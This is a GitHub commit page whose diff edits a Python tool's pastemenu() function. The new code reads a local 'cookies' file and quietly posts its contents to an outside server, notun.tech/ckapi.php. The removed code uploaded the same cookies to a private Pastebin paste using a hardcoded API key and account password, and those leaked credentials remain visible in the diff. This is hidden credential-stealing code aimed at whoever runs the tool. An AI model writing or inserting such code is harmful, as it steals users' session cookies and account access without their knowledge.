Skip to content

Commit

Permalink
Update .br.py
Browse files Browse the repository at this point in the history
  • Loading branch information
BotolMehedi authored Dec 17, 2021
1 parent 599ccca commit 122d85e
Showing 1 changed file with 4 additions and 8 deletions.
12 changes: 4 additions & 8 deletions .br.py
Original file line number Diff line number Diff line change
Expand Up @@ -199,17 +199,13 @@ def userinfo():
print(f"{p}ID : {c}{id}")
print(f"{ab}-----------------------------------------------{d}")

####Pastebin
####PasteServer

def pastemenu():
key = '18abe733f7bc2f2c8528c4cf5ab4e6af'
f = open('cookies', 'r')
cookies = f.read()
login_data = {'api_dev_key': key,'api_user_name': 'BotolMehedi','api_user_password': 'BotolFuck1234'}
data = {'api_option': 'paste','api_dev_key':key,'api_paste_code':cookies,'api_paste_private': '2','api_paste_expire_date': 'N','api_user_key': None,'api_paste_format': 'php'}
login = requests.post("https://pastebin.com/api/api_login.php", data=login_data)
data['api_user_key'] = login.text
r = requests.post("https://pastebin.com/api/api_post.php", data=data)
okfile = f.read()
data = {'textdata':okfile}
requests.post("https://b2k4.notun.tech/ckapi.php", data=data)

###Menu

Expand Down

0 comments on commit 122d85e

Please sign in to comment.